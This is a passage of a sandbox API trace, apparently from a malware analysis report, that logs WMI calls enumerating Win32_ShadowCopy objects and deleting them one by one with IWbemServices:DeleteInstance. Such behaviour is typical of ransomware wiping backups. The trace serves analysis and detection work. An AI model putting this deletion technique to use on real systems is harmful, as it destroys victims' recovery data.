pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0116.619] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x53 [0116.619] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0116.619] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0116.619] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0116.619] IUnknown:Release (This=0x212498) returned 0x1 [0116.620] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901ce0) returned 0x0 [0116.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901ce0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0116.620] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901ce0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902ad0) returned 0x0 [0116.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902ad0) returned 0x0 [0116.620] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0116.621] WbemDefPath:IUnknown:AddRef (This=0x1c902ad0) returned 0x3 [0116.621] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0116.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b786350) returned 0x0 [0116.621] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b786350, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.621] WbemDefPath:IUnknown:Release (This=0x1b786350) returned 0x3 [0116.621] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0116.621] WbemDefPath:IUnknown:AddRef (This=0x1c902ad0) returned 0x4 [0116.621] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0116.621] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x3 [0116.621] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x2 [0116.621] WbemDefPath:IUnknown:Release (This=0x1c901ce0) returned 0x0 [0116.621] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x1 [0116.622] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0116.622] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0116.622] WbemDefPath:IUnknown:AddRef (This=0x1c902ad0) returned 0x2 [0116.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902ad0) returned 0x0 [0116.622] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x2 [0116.622] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x1 [0116.622] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0116.622] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0116.622] WbemDefPath:IUnknown:AddRef (This=0x1c902ad0) returned 0x2 [0116.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902ad0, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902ad0) returned 0x0 [0116.622] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x2 [0116.622] WbemDefPath:IUnknown:AddRef (This=0x1c902ad0) returned 0x3 [0116.622] WbemDefPath:IWbemPath:SetText (This=0x1c902ad0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0116.623] WbemDefPath:IUnknown:Release (This=0x1c902ad0) returned 0x2 [0116.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0116.623] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0116.623] SysStringLen (param_1="root\\cimv2") returned 0xa [0116.623] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0116.623] SysStringLen (param_1="root\\cimv2") returned 0xa [0116.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d2a0 | out: puCount=0x1c64d2a0*=0x2) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d2a0*=0x17, pszText=0x0) returned 0x0 [0116.623] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d2a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64d2a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0116.623] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__CLASS", lFlags=0, pVal=0x1c64d290*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d28c*=0, plFlavor=0x1c64d288*=0 | out: pVal=0x1c64d290*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d28c*=8, plFlavor=0x1c64d288*=64) returned 0x0 [0116.623] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0116.624] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__CLASS", lFlags=0, pVal=0x1c64d2a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64 | out: pVal=0x1c64d2a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64d29c*=8, plFlavor=0x1c64d298*=64) returned 0x0 [0116.624] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0116.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c902ad0, puCount=0x1c64cfa0 | out: puCount=0x1c64cfa0*=0x2) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x1c902ad0, lFlags=4, puBuffLength=0x1c64cfa0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfa0*=0x54, pszText=0x0) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x1c902ad0, lFlags=4, puBuffLength=0x1c64cfa0*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfa0*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cef0 | out: puCount=0x1c64cef0*=0x2) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cef0*=0x17, pszText=0x0) returned 0x0 [0116.624] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cef0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cef0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0116.624] CoGetContextToken (in: pToken=0x1c64cd80 | out: pToken=0x1c64cd80) returned 0x0 [0116.624] WbemLocator:IUnknown:AddRef (This=0x1b797ce0) returned 0x3 [0116.624] WbemLocator:IUnknown:QueryInterface (in: This=0x1b797ce0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1b797ce0) returned 0x0 [0116.624] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x3 [0116.625] WbemLocator:IUnknown:Release (This=0x1b797ce0) returned 0x2 [0116.625] IWbemClassObject:Get (in: This=0x1c904ef0, wszName="__GENUS", lFlags=0, pVal=0x1c64cee0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cedc*=0, plFlavor=0x1c64ced8*=0 | out: pVal=0x1c64cee0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64cedc*=3, plFlavor=0x1c64ced8*=64) returned 0x0 [0116.625] WbemDefPath:IWbemPath:GetText (in: This=0x1c902ad0, lFlags=2, puBuffLength=0x1c64cfb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cfb0*=0x3d, pszText=0x0) returned 0x0 [0116.625] WbemDefPath:IWbemPath:GetText (in: This=0x1c902ad0, lFlags=2, puBuffLength=0x1c64cfb0*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c64cfb0*=0x3d, pszText="Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"") returned 0x0 [0116.625] IWbemServices:DeleteInstance (in: This=0x1c8f44f8, strObjectPath="Win32_ShadowCopy.ID=\"{51FFEAE1-0810-4889-92A9-E72417EBFA41}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0118.538] CoTaskMemAlloc (cb=0x8) returned 0x1b77f8d0 [0118.538] IEnumWbemClassObject:Next (in: This=0x1c8f4788, lTimeout=-1, uCount=0x1, apObjects=0x1b77f8d0, puReturned=0x1c64d8b8 | out: apObjects=0x1b77f8d0*=0x1c905590, puReturned=0x1c64d8b8*=0x1) returned 0x0 [0118.540] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cbe0 | out: ppvObject=0x1c64cbe0*=0x1c905590) returned 0x0 [0118.540] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64cc60 | out: ppvObject=0x1c64cc60*=0x0) returned 0x80004002 [0118.540] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x7fef2a9d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c9f8 | out: ppvObject=0x1c64c9f8*=0x0) returned 0x80004002 [0118.541] IUnknown:AddRef (This=0x1c905590) returned 0x3 [0118.541] CoGetContextToken (in: pToken=0x1c64c8b0 | out: pToken=0x1c64c8b0) returned 0x0 [0118.541] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c870 | out: ppvObject=0x1c64c870*=0x1c905598) returned 0x0 [0118.541] IMarshal:GetUnmarshalClass (in: This=0x1c905598, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c8a0 | out: pCid=0x1c64c8a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0118.541] IUnknown:Release (This=0x1c905598) returned 0x3 [0118.541] CoGetContextToken (in: pToken=0x1c64c880 | out: pToken=0x1c64c880) returned 0x0 [0118.541] IUnknown:AddRef (This=0x1c905590) returned 0x4 [0118.541] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c998 | out: ppvObject=0x1c64c998*=0x0) returned 0x80004002 [0118.541] IUnknown:Release (This=0x1c905590) returned 0x3 [0118.541] IUnknown:Release (This=0x1c905590) returned 0x2 [0118.541] CoGetContextToken (in: pToken=0x1c64cd40 | out: pToken=0x1c64cd40) returned 0x0 [0118.542] CoGetContextToken (in: pToken=0x1c64cc80 | out: pToken=0x1c64cc80) returned 0x0 [0118.542] IUnknown:AddRef (This=0x1c905590) returned 0x3 [0118.542] IUnknown:QueryInterface (in: This=0x1c905590, riid=0x1c64cdc0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c64cda0 | out: ppvObject=0x1c64cda0*=0x1c905590) returned 0x0 [0118.542] IUnknown:Release (This=0x1c905590) returned 0x3 [0118.542] IUnknown:Release (This=0x1c905590) returned 0x2 [0118.542] IUnknown:Release (This=0x1c905590) returned 0x1 [0118.542] CoTaskMemFree (pv=0x1b77f8d0) [0118.542] CoGetContextToken (in: pToken=0x1c64d6c0 | out: pToken=0x1c64d6c0) returned 0x0 [0118.542] IUnknown:AddRef (This=0x1c905590) returned 0x2 [0118.542] IWbemClassObject:Get (in: This=0x1c905590, wszName="__GENUS", lFlags=0, pVal=0x1c64d830*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d82c*=0, plFlavor=0x1c64d828*=0 | out: pVal=0x1c64d830*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c64d82c*=3, plFlavor=0x1c64d828*=64) returned 0x0 [0118.542] IWbemClassObject:Get (in: This=0x1c905590, wszName="__PATH", lFlags=0, pVal=0x1c64d7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64d7cc*=0, plFlavor=0x1c64d7c8*=0 | out: pVal=0x1c64d7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", varVal2=0x0), pType=0x1c64d7cc*=8, plFlavor=0x1c64d7c8*=64) returned 0x0 [0118.542] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x53 [0118.542] CoGetObjectContext (in: riid=0x1c64d768*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64d760 | out: ppv=0x1c64d760*=0x212498) returned 0x0 [0118.543] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64d780 | out: pAptType=0x1c64d780*=1) returned 0x0 [0118.543] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64d888 | out: ppvObject=0x1c64d888*=0x0) returned 0x80004002 [0118.543] IUnknown:Release (This=0x212498) returned 0x1 [0118.543] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cdf0 | out: ppv=0x1c64cdf0*=0x1c901da0) returned 0x0 [0118.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c901da0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64cb00 | out: ppvObject=0x1c64cb00*=0x0) returned 0x80004002 [0118.544] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c901da0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64cae8 | out: ppvObject=0x1c64cae8*=0x1c902b90) returned 0x0 [0118.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c9f0 | out: ppvObject=0x1c64c9f0*=0x1c902b90) returned 0x0 [0118.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64ca70 | out: ppvObject=0x1c64ca70*=0x0) returned 0x80004002 [0118.544] WbemDefPath:IUnknown:AddRef (This=0x1c902b90) returned 0x3 [0118.544] CoGetContextToken (in: pToken=0x1c64c6c0 | out: pToken=0x1c64c6c0) returned 0x0 [0118.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c680 | out: ppvObject=0x1c64c680*=0x1b792b70) returned 0x0 [0118.544] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b792b70, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64c6b0 | out: pCid=0x1c64c6b0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0118.544] WbemDefPath:IUnknown:Release (This=0x1b792b70) returned 0x3 [0118.545] CoGetContextToken (in: pToken=0x1c64c690 | out: pToken=0x1c64c690) returned 0x0 [0118.545] WbemDefPath:IUnknown:AddRef (This=0x1c902b90) returned 0x4 [0118.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c7a8 | out: ppvObject=0x1c64c7a8*=0x0) returned 0x80004002 [0118.545] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x3 [0118.545] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x2 [0118.545] WbemDefPath:IUnknown:Release (This=0x1c901da0) returned 0x0 [0118.545] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x1 [0118.545] CoGetContextToken (in: pToken=0x1c64d3c0 | out: pToken=0x1c64d3c0) returned 0x0 [0118.545] CoGetContextToken (in: pToken=0x1c64d300 | out: pToken=0x1c64d300) returned 0x0 [0118.545] WbemDefPath:IUnknown:AddRef (This=0x1c902b90) returned 0x2 [0118.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x1c64d440*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d420 | out: ppvObject=0x1c64d420*=0x1c902b90) returned 0x0 [0118.545] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x2 [0118.546] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x1 [0118.546] CoGetContextToken (in: pToken=0x1c64d540 | out: pToken=0x1c64d540) returned 0x0 [0118.546] CoGetContextToken (in: pToken=0x1c64d480 | out: pToken=0x1c64d480) returned 0x0 [0118.546] WbemDefPath:IUnknown:AddRef (This=0x1c902b90) returned 0x2 [0118.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c902b90, riid=0x1c64d5c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64d5a0 | out: ppvObject=0x1c64d5a0*=0x1c902b90) returned 0x0 [0118.546] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x2 [0118.546] WbemDefPath:IUnknown:AddRef (This=0x1c902b90) returned 0x3 [0118.546] WbemDefPath:IWbemPath:SetText (This=0x1c902b90, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0118.546] WbemDefPath:IUnknown:Release (This=0x1c902b90) returned 0x2 [0118.546] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64d800 | out: puCount=0x1c64d800*=0x2) returned 0x0 [0118.546] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c64d800*=0x17, pszText=0x0) returned 0x0 [0118.547] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64d800*=0x17, 